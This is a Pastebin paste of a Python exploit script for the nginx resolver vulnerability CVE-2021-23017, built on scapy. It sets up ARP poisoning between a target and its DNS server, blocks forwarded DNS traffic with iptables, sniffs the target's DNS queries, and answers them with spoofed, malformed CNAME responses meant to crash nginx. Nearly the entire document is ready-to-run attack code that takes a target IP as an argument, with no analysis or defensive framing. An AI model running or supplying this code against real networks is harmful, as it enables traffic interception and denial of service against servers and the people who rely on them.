FlyFar

Nginx 1.20.0 - Denial of Service (DOS) - CVE-2021-23017

Feb 2nd, 2024
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.69 KB | Cybersecurity | 0 0
  1.  
  2. from scapy.all import *
  3. from multiprocessing import Process
  4. from binascii import hexlify, unhexlify
  5. import argparse, time, os
  6.  
  7. def device_setup():
  8.     os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
  9.     os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
  10.  
  11. def ARPP(target, dns_server):
  12.     print("[*] Sending poisoned ARP packets")
  13.     target_mac = getmacbyip(target)
  14.     dns_server_mac = getmacbyip(dns_server)
  15.     while True:
  16.         time.sleep(2)
  17.         send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
  18.         send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
  19.  
  20. def exploit(target):
  21.     print("[*] Listening ")
  22.     sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
  23.  
  24. """
  25. RFC schema
  26. 0                   1                   2                   3
  27. 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
  28. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  29. |             LENGTH            |               ID              |
  30. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  31. |Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
  32. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  33. |            ANCOUNT            |            NSCOUNT            |
  34. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  35. |            ARCOUNT            |               QD              |
  36. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  37. |               AN              |               NS              |
  38. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  39. |               AR              |
  40. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  41.  
  42. Fig. DNS                            
  43.  
  44. """
  45. def process_received_packet(received_packet):
  46.     if received_packet[IP].src == target_ip:
  47.         if received_packet.haslayer(DNS):
  48.             if DNSQR in received_packet:
  49.                 print("[*] the received packet: " + str(bytes_hex(received_packet)))
  50.                 print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
  51.                 try:
  52.                     # \/    the received DNS request
  53.                     dns_request = received_packet[DNS].build()
  54.                     null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
  55.                     print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
  56.                     print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
  57.                     payload = [
  58.                         dns_request[0:2],
  59.                         b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
  60.                         dns_request[12:null_pointer_index+1],
  61.                         dns_request[null_pointer_index+1:null_pointer_index+3],
  62.                         dns_request[null_pointer_index+3:null_pointer_index+5],
  63.                         b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
  64.                         b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
  65.                         b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
  66.                         b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
  67.                     ]
  68.  
  69.                     payload = b"".join(payload)
  70.                     spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/ \
  71.                                    UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/ \
  72.                                    payload)
  73.                     print("[+] dns answer: "+str(hexlify(payload)))
  74.                     print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
  75.  
  76.                     sendp(spoofed_pkt, count=1)
  77.                     print("\n[+] malicious answer was sent")
  78.                     print("[+] exploited\n")
  79.                 except:
  80.                     print("\n[-] ERROR")
  81.  
  82. def main():
  83.     global target_ip
  84.     parser = argparse.ArgumentParser()
  85.     parser.add_argument("-t", "--target", help="IP address of the target")
  86.     parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
  87.     args = parser.parse_args()
  88.     target_ip = args.target
  89.     dns_server_ip = args.dns_server
  90.     device_setup()
  91.     processes_list = []
  92.     ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
  93.     exploitProcess = Process(target=exploit,args=(target_ip,))
  94.     processes_list.append(ARPPProcess)
  95.     processes_list.append(exploitProcess)
  96.     for process in processes_list:
  97.         process.start()
  98.     for process in processes_list:
  99.         process.join()
  100.  
  101. if __name__ == '__main__':
  102.     target_ip = ""
  103.     main()
Add Comment
Please, Sign In to add comment